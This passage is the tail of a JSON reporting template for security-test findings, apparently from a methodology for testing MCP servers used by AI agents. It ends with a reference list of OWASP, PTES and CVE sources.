      "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H",
      "category": "authentication|injection|traversal|session|resource",
      "status": "OPEN|REMEDIATED|ACCEPTED",
      "description": "Detailed description of the vulnerability",
      "impact": "What an attacker could achieve",
      "steps_to_reproduce": [
        "Step 1",
        "Step 2"
      ],
      "evidence": "Screenshot, log output, or response data",
      "remediation": {
        "short_term": "Immediate mitigation",
        "long_term": "Architectural fix"
      },
      "references": ["CVE-XXXX-XXXXX", "OWASP reference"]
    }
  ],
  "recommendations": {
    "immediate": ["Actions for this week"],
    "short_term": ["Actions for next 30 days"],
    "long_term": ["Architectural improvements"]
  }
}
References
- VulnerableMCP Project Methodology: Systematic approach to MCP vulnerability discovery
- OWASP ASI: Agentic Security Initiative -- security testing guidelines for AI agent infrastructure
- OWASP Testing Guide: Web Application Security Testing
- PTES: Penetration Testing Execution Standard -- adapted for MCP
- MCP Security Guide: Comprehensive MCP threat model
- CVE-2025-6514, CVE-2025-68145, CVE-2026-25536: Reference vulnerabilities used in test cases